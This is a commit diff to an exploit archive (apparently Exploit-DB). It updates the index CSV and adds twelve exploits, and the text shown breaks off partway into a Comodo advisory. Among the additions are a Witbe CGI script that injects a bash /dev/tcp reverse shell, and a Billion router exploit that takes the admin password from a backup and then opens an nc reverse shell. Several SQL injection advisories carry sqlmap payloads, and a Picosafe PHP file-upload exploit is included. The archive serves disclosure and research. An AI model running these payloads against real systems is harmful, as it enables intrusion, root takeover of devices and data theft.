DB: 2016-10-07
12 new exploits phpBB 2.0.10 - Remote Command Execution (CGI) Advance MLM Script - SQL Injection Picosafe Web Gui - Multiple Vulnerabilities Witbe - Remote Code Execution PHP Classifieds Rental Script - Blind SQL Injection B2B Portal Script - Blind SQL Injection MLM Unilevel Plan Script v1.0.2 - SQL Injection Just Dial Clone Script - SQL Injection Comodo Dragon Browser - Unquoted Service Path Privilege Escalation Billion Router 7700NR4 - Remote Command Execution Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation Exagate WEBPack Management System - Multiple Vulnerabilities
This commit is contained in:
parent
5fbed83086
commit
cd9e638108
13 changed files with 657 additions and 1 deletions
13
files.csv
13
files.csv
|
@ -520,7 +520,7 @@ id,file,description,date,author,platform,type,port
|
|||
670,platforms/windows/remote/670.c,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow (2)",2004-12-01,JohnH,windows,remote,143
|
||||
671,platforms/windows/dos/671.c,"Neverwinter Nights special - Fake Players Denial of Service",2004-12-01,"Luigi Auriemma",windows,dos,0
|
||||
672,platforms/windows/dos/672.c,"Kreed 1.05 - Format String / Denial of Service",2004-12-02,"Luigi Auriemma",windows,dos,0
|
||||
673,platforms/php/webapps/673.cgi,"phpBB 2.0.10 - Remote Command Execution (CGI)",2004-12-03,ZzagorR,php,webapps,0
|
||||
673,platforms/php/webapps/673.pl,"phpBB 2.0.10 - Remote Command Execution (CGI)",2004-12-03,ZzagorR,php,webapps,0
|
||||
675,platforms/windows/remote/675.txt,"Hosting Controller 0.6.1 Hotfix 1.4 - Directory Browsing",2004-12-05,Mouse,windows,remote,0
|
||||
676,platforms/php/webapps/676.c,"phpBB 1.0.0 / 2.0.10 - admin_cash.php Remote Exploit",2004-12-05,evilrabbi,php,webapps,0
|
||||
677,platforms/windows/dos/677.txt,"GetRight 5.2a - Skin File (.grs) Buffer Overflow",2004-12-06,ATmaCA,windows,dos,0
|
||||
|
@ -3881,6 +3881,7 @@ id,file,description,date,author,platform,type,port
|
|||
4226,platforms/windows/remote/4226.html,"Clever Internet ActiveX Suite 6.2 - Arbitrary File Download/Overwrite",2007-07-25,shinnai,windows,remote,0
|
||||
4227,platforms/windows/dos/4227.php,"PHP - PHP_gd2.dll imagepsloadfont Local Buffer Overflow (PoC)",2007-07-26,r0ut3r,windows,dos,0
|
||||
4228,platforms/windows/remote/4228.pl,"IPSwitch IMail Server 2006 9.10 - Subscribe Remote Overflow",2007-07-26,ZhenHan.Liu,windows,remote,143
|
||||
40466,platforms/php/webapps/40466.txt,"Advance MLM Script - SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
|
||||
4229,platforms/windows/local/4229.pl,"CrystalPlayer 1.98 - '.mls' Local Buffer Overflow",2007-07-26,"Arham Muhammad",windows,local,0
|
||||
4230,platforms/windows/remote/4230.html,"Nessus Vulnerability Scanner 3.0.6 - ActiveX Remote Delete File Exploit",2007-07-26,h07,windows,remote,0
|
||||
4231,platforms/aix/local/4231.c,"IBM AIX 5.3 sp6 - capture Terminal Sequence Privilege Escalation",2007-07-27,qaaz,aix,local,0
|
||||
|
@ -36575,6 +36576,7 @@ id,file,description,date,author,platform,type,port
|
|||
40450,platforms/linux/local/40450.txt,"Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation",2016-10-03,"Dawid Golunski",linux,local,0
|
||||
40451,platforms/win_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",win_x86-64,local,0
|
||||
40452,platforms/windows/remote/40452.py,"Disk Pulse Enterprise 9.0.34 - Buffer Overflow",2016-10-03,Tulpa,windows,remote,80
|
||||
40454,platforms/php/webapps/40454.txt,"Picosafe Web Gui - Multiple Vulnerabilities",2016-10-05,"Shahab Shamsi",php,webapps,0
|
||||
40455,platforms/windows/remote/40455.py,"VX Search Enterprise 9.0.26 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
|
||||
40456,platforms/windows/remote/40456.py,"Sync Breeze Enterprise 8.9.24 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
|
||||
40457,platforms/windows/remote/40457.py,"Dup Scout Enterprise 9.0.28 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
|
||||
|
@ -36582,3 +36584,12 @@ id,file,description,date,author,platform,type,port
|
|||
40459,platforms/windows/remote/40459.py,"Disk Savvy Enterprise 9.0.32 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
|
||||
40460,platforms/windows/local/40460.txt,"Abyss Web Server X1 2.11.1 - Unquoted Service Path Privilege Escalation",2016-10-05,Tulpa,windows,local,0
|
||||
40461,platforms/windows/local/40461.txt,"Fortitude HTTP 1.0.4.0 - Unquoted Service Path Privilege Escalation",2016-10-05,Tulpa,windows,local,0
|
||||
40462,platforms/cgi/webapps/40462.py,"Witbe - Remote Code Execution",2016-10-05,BeLmar,cgi,webapps,0
|
||||
40467,platforms/php/webapps/40467.txt,"PHP Classifieds Rental Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
|
||||
40468,platforms/php/webapps/40468.txt,"B2B Portal Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
|
||||
40469,platforms/php/webapps/40469.txt,"MLM Unilevel Plan Script v1.0.2 - SQL Injection",2016-10-06,N4TuraL,php,webapps,0
|
||||
40470,platforms/php/webapps/40470.txt,"Just Dial Clone Script - SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
|
||||
40471,platforms/windows/local/40471.txt,"Comodo Dragon Browser - Unquoted Service Path Privilege Escalation",2016-10-06,@Th3GundY,windows,local,0
|
||||
40472,platforms/hardware/remote/40472.py,"Billion Router 7700NR4 - Remote Command Execution",2016-10-06,R-73eN,hardware,remote,0
|
||||
40473,platforms/windows/local/40473.txt,"Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation",2016-10-06,@Th3GundY,windows,local,0
|
||||
40474,platforms/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",hardware,remote,0
|
||||
|
|
Can't render this file because it is too large.
|
39
platforms/cgi/webapps/40462.py
Executable file
39
platforms/cgi/webapps/40462.py
Executable file
|
@ -0,0 +1,39 @@
|
|||
#!/usr/bin/python
|
||||
# Exploit Title: Witbe RCE (Remote Code Execution)
|
||||
# Exploit Author: BeLmar
|
||||
# Date: 05/10/2016
|
||||
# DEMO : https://youtu.be/ooUFXfUfIs0
|
||||
# Contact : hb.mz093@gmail.com
|
||||
# Vendor Homepage: http://www.witbe.net
|
||||
# Tested on: Windows7/10 & BackBox
|
||||
# Category: Remote Exploits
|
||||
|
||||
import urllib
|
||||
import urllib2
|
||||
import os
|
||||
|
||||
print " M MW M M XXMMrX, 2Mr72S MW7XS"
|
||||
print " MM MM M2 M SM MM MM M "
|
||||
print " M M ZM M M XM MMir0M MMrXS"
|
||||
print " MM M M M: M SM MM ZM M2 "
|
||||
print " MMa MMM M ZM MM XM M "
|
||||
print " XM M M iM 8MZ8W8 MM8BB"
|
||||
print " EXPLOIT BY BELMAR "
|
||||
print ""
|
||||
|
||||
print "Run NetCat Listner" # First Run Netcat Listner
|
||||
|
||||
rhost = raw_input('RHOST: ')
|
||||
lhost = raw_input('LHOST: ')
|
||||
lport = raw_input('LPORT: ')
|
||||
|
||||
url = 'http://'+rhost+'/cgi-bin/applyConfig.pl'
|
||||
user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36'
|
||||
values = {'auth_login': '', #Leave it as it is
|
||||
'auth_pwd': '', #Leave it as it is
|
||||
'file': 'set|bash -i >& /dev/tcp/'+lhost+'/'+lport+' 0>&1' }
|
||||
|
||||
data = urllib.urlencode(values)
|
||||
req = urllib2.Request(url, data)
|
||||
response = urllib2.urlopen(req)
|
||||
the_page = response.read()
|
69
platforms/hardware/remote/40472.py
Executable file
69
platforms/hardware/remote/40472.py
Executable file
|
@ -0,0 +1,69 @@
|
|||
# Title : Billion Router 7700NR4 Remote Root Command Execution
|
||||
# Date : 06/10/2016
|
||||
# Author : R-73eN
|
||||
# Tested on: Billion Router 7700NR4
|
||||
# Vendor : http://www.billion.com/
|
||||
# Vulnerability Description:
|
||||
# This router is a widely used here in Albania. It is given by a telecom provider to the home and bussiness users.
|
||||
# The problem is that this router has hardcoded credentials which "can not be changed" by a normal user. Using these
|
||||
# credentials we don't have to much access but the lack of authentication security we can download the backup and get the admin password.
|
||||
# Using that password we can login to telnet server and use a shell escape to get a reverse root connection.
|
||||
# You must change host with the target and reverse_ip with your attacking ip.
|
||||
# Fix:
|
||||
# The only fix is hacking your router with this exploit, changing the credentials and disabling all the other services using iptables.
|
||||
#
|
||||
|
||||
import requests
|
||||
import base64
|
||||
import socket
|
||||
import time
|
||||
|
||||
host = ""
|
||||
def_user = "user"
|
||||
def_pass = "user"
|
||||
reverse_ip = ""
|
||||
#Banner
|
||||
banner = ""
|
||||
banner +=" ___ __ ____ _ _ \n"
|
||||
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
|
||||
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
|
||||
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
|
||||
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
|
||||
print banner
|
||||
|
||||
|
||||
# limited shell escape
|
||||
evil = 'ping ;rm /tmp/backpipe;cd tmp;echo "mknod backpipe p && nc ' + reverse_ip + ' 1337 0<backpipe | /bin/sh 1>backpipe &" > /tmp/rev.sh;chmod +x rev.sh;sh /tmp/rev.sh &'
|
||||
|
||||
def execute_payload(password):
|
||||
print "[+] Please run nc -lvp 1337 and then press any key [+]"
|
||||
raw_input()
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((host,23))
|
||||
s.recv(1024)
|
||||
s.send("admin\r")
|
||||
a= s.recv(1024)
|
||||
time.sleep(1)
|
||||
s.send(password +"\r")
|
||||
time.sleep(1)
|
||||
s.recv(1024)
|
||||
s.send(evil + "\r")
|
||||
time.sleep(1)
|
||||
print "[+] If everything worked you should get a reverse shell [+]"
|
||||
print "[+] Warning pressing any key will close the SHELL [+]"
|
||||
raw_input()
|
||||
|
||||
|
||||
|
||||
|
||||
r = requests.get("http://" + host + "/backupsettings.conf" , auth=(def_user,def_pass))
|
||||
if(r.status_code == 200):
|
||||
print "[+] Seems the exploit worked [+]"
|
||||
print "[+] Dumping data . . . [+]"
|
||||
temp = r.text
|
||||
admin_pass = temp.split("<AdminPassword>")[1].split("</AdminPassword>")[0]
|
||||
# print "[+] Admin password : " + str(base64.b64decode(admin_pass)) + " [+]"
|
||||
execute_payload(str(base64.b64decode(admin_pass)))
|
||||
else:
|
||||
print "[-] Exploit Failed [-]"
|
||||
print "\n[+] https://www.infogen.al/ [+]\n\n"
|
100
platforms/hardware/remote/40474.txt
Executable file
100
platforms/hardware/remote/40474.txt
Executable file
|
@ -0,0 +1,100 @@
|
|||
Document Title:
|
||||
================
|
||||
Exagate WEBpack Management System Multiple Vulnerabilities
|
||||
|
||||
Author:
|
||||
========
|
||||
Halil Dalabasmaz
|
||||
|
||||
Release Date:
|
||||
==============
|
||||
07 OCT 2016
|
||||
|
||||
Product & Service Introduction:
|
||||
================================
|
||||
WEBPack is the individual built-in user-friendly and skilled web
|
||||
interface allowing web-based access to the main units of the SYSGuard
|
||||
and POWERGuard series. The advanced software enables the users to
|
||||
design their customized dashboard smoothly for a detailed monitoring
|
||||
and management of all the power outlet sockets & sensor and volt free
|
||||
contact ports, as well as relay outputs. User definition and authorization,
|
||||
remote access and update, detailed reporting and archiving are among the
|
||||
many features.
|
||||
|
||||
Vendor Homepage:
|
||||
=================
|
||||
http://www.exagate.com/
|
||||
|
||||
Vulnerability Information:
|
||||
===========================
|
||||
Exagate company uses WEBPack Management System software on the hardware.
|
||||
The software is web-based and it is provide control on the hardware. There are
|
||||
multiple vulnerabilities on that software.
|
||||
|
||||
Vulnerability #1: SQL Injection
|
||||
================================
|
||||
|
||||
There is no any filtering or validation mechanisim on "login.php". "username"
|
||||
and "password" inputs are vulnerable to SQL Injection attacks. Sample POST
|
||||
request is given below.
|
||||
|
||||
POST /login.php HTTP/1.1
|
||||
Host: <TARGET HOST>
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 37
|
||||
|
||||
username=root&password=' or 1=1--
|
||||
|
||||
Vulnerability #2: Unauthorized Access To Sensetive Information
|
||||
===============================================================
|
||||
|
||||
The software is capable of sending e-mail to system admins. But there is no
|
||||
any authorization mechanism to access e-mail logs. The e-mail logs can accessable
|
||||
anonymously from "http://<TARGET HOST>/emaillog.txt".
|
||||
|
||||
Vulnerability #3: Unremoved Configuration Files
|
||||
================================================
|
||||
|
||||
The software contains the PHP Info file on the following URL.
|
||||
|
||||
http://<TARGET HOST>/api/phpinfo.php
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
03 OCT 2016 - Attempted to contact vendor after discovery of vulnerabilities
|
||||
06 OCT 2016 - No response from vendor and re-attempted to contact vendor
|
||||
07 OCT 2016 - No response from vendor
|
||||
07 OCT 2016 - Public Disclosure
|
||||
|
||||
Discovery Status:
|
||||
==================
|
||||
Published
|
||||
|
||||
Affected Product(s):
|
||||
=====================
|
||||
Exagate SYSGuard 3001 (Most probably all Exagate hardwares affected that vulnerabilities)
|
||||
|
||||
Tested On:
|
||||
===========
|
||||
Exagate SYSGuard 3001
|
||||
|
||||
Disclaimer & Information:
|
||||
==========================
|
||||
The information provided in this advisory is provided as it is without
|
||||
any warranty. BGA disclaims all warranties, either expressed or implied,
|
||||
including the warranties of merchantability and capability for a particular
|
||||
purpose. BGA or its suppliers are not liable in any case of damage, including
|
||||
direct, indirect, incidental, consequential loss of business profits or
|
||||
special damages.
|
||||
|
||||
Domain: www.bgasecurity.com
|
||||
Social: twitter.com/bgasecurity
|
||||
Contact: advisory@bga.com.tr
|
||||
|
||||
Copyright © 2016 | BGA Security LLC
|
65
platforms/php/webapps/40454.txt
Executable file
65
platforms/php/webapps/40454.txt
Executable file
|
@ -0,0 +1,65 @@
|
|||
[-] Title : Picosafe Web Gui - Multiple Vulnerabilities
|
||||
[-] Author : Shahab Shamsi
|
||||
[-] Vendor : https://github.com/embeddedprojects/picosafe_webgui
|
||||
[-] Category : Webapps
|
||||
[-] Date : 01.October.2016
|
||||
|
||||
|
||||
|
||||
Vulnerable page :
|
||||
picosafe_webgui/webinterface/js/filemanager/filemanager.php
|
||||
|
||||
|
||||
|
||||
|
||||
==========================
|
||||
| Remote File Upload :
|
||||
==========================
|
||||
Vulnerable Source (RFU) :
|
||||
52: chmod($to, 0755);
|
||||
48: $to = realpath($curdir) . '/' . $name;
|
||||
40: function uploadfile($curdir)
|
||||
46: $name = $_FILES['files']['name'][0];
|
||||
|
||||
Exploit :
|
||||
<?php
|
||||
$uploadfile="YourFileName";
|
||||
$ch = curl_init("http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/filemanager.php");
|
||||
curl_setopt($ch, CURLOPT_POST, true);
|
||||
curl_setopt($ch, CURLOPT_POSTFIELDS,
|
||||
array('file'=>"@$uploadfile"));
|
||||
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
|
||||
$result = curl_exec($ch);
|
||||
curl_close($ch);
|
||||
print "$result";
|
||||
?>
|
||||
|
||||
Location :
|
||||
http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/FileName
|
||||
|
||||
|
||||
==========================
|
||||
| Local File Disclosure :
|
||||
==========================
|
||||
|
||||
Vulnerable Source (LFD) :
|
||||
17: $file = base64_decode($_GET['file']);
|
||||
18: DownloadFile($file);
|
||||
111: readfile($file);
|
||||
|
||||
POC :
|
||||
http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/filemanager.php?file=base64code-Filename
|
||||
|
||||
|
||||
==========================
|
||||
| Cross-Site Scripting :
|
||||
==========================
|
||||
|
||||
Vulnerable Source (XSS) :
|
||||
8: echo json_encode($data);
|
||||
7: $data = sortfiles($data);
|
||||
6: $data = listdirectory($directory);
|
||||
5: $directory = base64_decode($_GET['directory']);
|
||||
|
||||
POC :
|
||||
http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/filemanager.php?directory=Base64-ScriptingCode
|
60
platforms/php/webapps/40466.txt
Executable file
60
platforms/php/webapps/40466.txt
Executable file
|
@ -0,0 +1,60 @@
|
|||
[x]========================================================================================================================================[x]
|
||||
| Title : Advance MLM Script SQL Vulnerabilities
|
||||
| Software : Advance MLM Script
|
||||
| Vendor : http://www.i-netsolution.com/
|
||||
| Demo : http://www.i-netsolution.com/item/advance-mlm-script/live_demo/236431
|
||||
| Google Dork : news_detail.php?newid= © MLM SCRIPT
|
||||
| Date : 06 October 2016
|
||||
| Author : OoN_Boy
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Technology : PHP
|
||||
| Database : MySQL
|
||||
| Price : $ 199
|
||||
| Description : MLM business upward day by day, Open Source MLM Script plays an important role for successful multilevel marketing business.
|
||||
Our advanced featured PHP MLM Script enables MLM companies to manage and run their express selling business more effectively towards a successful way.
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Exploit : http://localhost/mlm/news_detail.php?newid=%Inject_Here%26
|
||||
| Aadmin Page : http://localhost/[path]/admin/index.php
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Proof of concept : sqlmap -u "http://localhost/mlm/news_detail.php?newid=26" --invalid-string
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
---
|
||||
Parameter: newid (GET)
|
||||
Type: boolean-based blind
|
||||
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
Payload: newid=26' AND 4440=4440 AND 'AJmz'='AJmz
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 OR time-based blind
|
||||
Payload: newid=26' OR SLEEP(5) AND 'FokP'='FokP
|
||||
|
||||
Type: UNION query
|
||||
Title: Generic UNION query (NULL) - 6 columns
|
||||
Payload: newid=jMCtRq' UNION ALL SELECT NULL,CONCAT(0x71787a7a71,0x48755652787877617966627661486164744748424b6155564f514370537747504c6e736876665150,0x7178787171),NULL,NULL,NULL,NULL-- Afye
|
||||
---
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Greetz : antisecurity.org batamhacker.or.id
|
||||
| Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va
|
||||
| k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Hi All long time no see ^_^
|
||||
[x]========================================================================================================================================[x]
|
61
platforms/php/webapps/40467.txt
Executable file
61
platforms/php/webapps/40467.txt
Executable file
|
@ -0,0 +1,61 @@
|
|||
[x]========================================================================================================================================[x]
|
||||
| Title : PHP Classifieds Rental Script Blind SQL Vulnerabilities
|
||||
| Software : PHP Classifieds Rental Script
|
||||
| Vendor : http://www.i-netsolution.com/
|
||||
| Demo : http://www.i-netsolution.com/item/php-classifieds-rental-script/244993
|
||||
| Date : 06 October 2016
|
||||
| Author : OoN_Boy
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Technology : PHP
|
||||
| Database : MySQL
|
||||
| Price : $ 99
|
||||
| Description : PHP Classifieds Rental Script The PHP Rental Classifieds Script is one among the limited software's, which are designed
|
||||
so user-friendly that anyone with minimal knowledge of operating a computer can utilize it to its optimum. Besides being
|
||||
an easy-to- use software, this Property Rental Script
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Exploit : http://localhost/product_details.php?refid=%Inject_Here%1319258872
|
||||
| Aadmin Page : http://localhost/[path]/admin/index.php
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Proof of concept : sqlmap -u "http://localhost/product_details.php?refid=1319258872" --invalid-string
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
---
|
||||
Parameter: refid (GET)
|
||||
Type: boolean-based blind
|
||||
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
Payload: refid=1319258872' AND 3912=3912 AND 'HTMi'='HTMi
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 OR time-based blind
|
||||
Payload: refid=1319258872' OR SLEEP(5) AND 'QwXZ'='QwXZ
|
||||
|
||||
Type: UNION query
|
||||
Title: MySQL UNION query (NULL) - 26 columns
|
||||
Payload: refid=xCUcyB' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787671,0x644e6e5046537647684864705a527667796f454c666c4656644a73506d4e627a48574969424a4756,0x7176786271),NULL,NULL,NULL,NULL,NULL#
|
||||
---
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Greetz : antisecurity.org batamhacker.or.id
|
||||
| Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va
|
||||
| k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Hi All long time no see ^_^
|
||||
[x]========================================================================================================================================[x]
|
61
platforms/php/webapps/40468.txt
Executable file
61
platforms/php/webapps/40468.txt
Executable file
|
@ -0,0 +1,61 @@
|
|||
[x]========================================================================================================================================[x]
|
||||
| Title : B2B Portal Script Blind SQL Vulnerabilities
|
||||
| Software : B2B Portal Script
|
||||
| Vendor : http://www.i-netsolution.com/
|
||||
| Demo : http://www.i-netsolution.com/item/b2b-portal-script/live_demo/190275
|
||||
| Date : 06 October 2016
|
||||
| Author : OoN_Boy
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Technology : PHP
|
||||
| Database : MySQL
|
||||
| Price : $ 249
|
||||
| Description : Have an idea about starting your own Alibaba clone website and thinking how to implement it? Our B2B Portal Script
|
||||
is the platform to transform your idea into the practical world. It is developed in PHP and MySQL and can help global
|
||||
portals to manage their online transactions with efficiency
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Exploit : http://localhost/advancedb2b/view-product.php?pid=294'
|
||||
| Aadmin Page : http://localhost/[path]/admin/index.php
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Proof of concept : sqlmap -u "http://localhost/advancedb2b/view-product.php?pid=294"
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
---
|
||||
Parameter: pid (GET)
|
||||
Type: boolean-based blind
|
||||
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
Payload: pid=294' AND 1754=1754 AND 'whqn'='whqn
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 AND time-based blind
|
||||
Payload: pid=294' AND SLEEP(5) AND 'nGqC'='nGqC
|
||||
|
||||
Type: UNION query
|
||||
Title: Generic UNION query (NULL) - 33 columns
|
||||
Payload: pid=294' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178766b71,0x656f5962547177636a47435158754754736267535a4d515a4d4c454e535052496652505243795849,0x7176626271),NULL,NULL-- lwGp
|
||||
---
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Greetz : antisecurity.org batamhacker.or.id
|
||||
| Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va
|
||||
| k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Hi All long time no see ^_^
|
||||
[x]========================================================================================================================================[x]
|
44
platforms/php/webapps/40469.txt
Executable file
44
platforms/php/webapps/40469.txt
Executable file
|
@ -0,0 +1,44 @@
|
|||
######################
|
||||
# Application Name : MLM Unilevel Plan Script v1.0.2
|
||||
|
||||
# Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL
|
||||
|
||||
# Author Contact : https://twitter.com/byn4tural
|
||||
|
||||
# Vendor Homepage : http://www.i-netsolution.com/
|
||||
|
||||
# Vulnerable Type : SQL Injection
|
||||
|
||||
# Date : 2016-10-06
|
||||
|
||||
# Tested on : Windows 10 / Mozilla Firefox
|
||||
# Linux / Mozilla Firefox
|
||||
# Linux / sqlmap 1.0.6.28#dev
|
||||
|
||||
###################### SQL Injection Vulnerability ######################
|
||||
|
||||
# Location :
|
||||
http://localhost/[path]/news_detail.php
|
||||
|
||||
######################
|
||||
|
||||
# PoC Exploit:
|
||||
|
||||
http://localhost/[path]/news_detail.php?newid=11%27%20%2F*%2130000and%20ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3C115%20and*%2F%20%27x%27%3D%27x
|
||||
|
||||
# Exploit Code via sqlmap:
|
||||
|
||||
sqlmap -u http://localhost/[path]/news_detail.php?newid=11 --dbs
|
||||
|
||||
---
|
||||
Parameter: newid (GET)
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 AND time-based blind
|
||||
Payload: newid=11' AND SLEEP(5) AND 'HheB'='HheB
|
||||
---
|
||||
[18:47:12] [INFO] the back-end DBMS is MySQL
|
||||
web application technology: Nginx
|
||||
back-end DBMS: MySQL >= 5.0.12
|
||||
|
||||
######################
|
||||
|
40
platforms/php/webapps/40470.txt
Executable file
40
platforms/php/webapps/40470.txt
Executable file
|
@ -0,0 +1,40 @@
|
|||
[x]========================================================================================================================================[x]
|
||||
| Title : Just Dial Clone Script SQL & XSS Vulnerabilities
|
||||
| Software : Just Dial Clone
|
||||
| Vendor : http://www.i-netsolution.com/
|
||||
| Demo : http://www.i-netsolution.com/item/just-dial-clone/live_demo/423618
|
||||
| Date : 06 October 2016
|
||||
| Author : OoN_Boy
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Technology : PHP
|
||||
| Database : MySQL
|
||||
| Price : $ 299
|
||||
| Description : If you wish to launch your own business directory website, we have a readymade solution for you which supports unlimited
|
||||
categories, uses and secure code. Our Company Catalogue Listing Script is just the right script for you
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Exploit : http://localhost/jus/restaurants-details.php?fid=%Inject_Here%21
|
||||
| Admin Page : http://localhost/[path]/admin/index.php
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Proof of concept SQL : http://localhost/jus/restaurants-details.php?fid=%Inject_Here%21
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Greetz : antisecurity.org batamhacker.or.id
|
||||
| Vrs-hCk NoGe Jack zxvf Angela h4ntu reel dono Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va
|
||||
| k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Hi All long time no see ^_^
|
||||
[x]========================================================================================================================================[x]
|
53
platforms/windows/local/40471.txt
Executable file
53
platforms/windows/local/40471.txt
Executable file
|
@ -0,0 +1,53 @@
|
|||
# Exploit Title: Comodo Dragon Browser Unquoted Service Path Privilege Escalation
|
||||
# Date: 24/09/2016
|
||||
# Author: Yunus YILDIRIM (@Th3GundY)
|
||||
# Team: CT-Zer0 (@CRYPTTECH)
|
||||
# Website: http://yildirimyunus.com
|
||||
# Contact: yunusyildirim@protonmail.com
|
||||
# Category: local
|
||||
# Vendor Homepage: https://www.comodo.com
|
||||
# Software Link: https://www.comodo.com/home/browsers-toolbars/browser.php
|
||||
# Version: Software Version <= 52.15.25.663
|
||||
# Tested on: Windows 7 x86/x64
|
||||
|
||||
1. Description
|
||||
|
||||
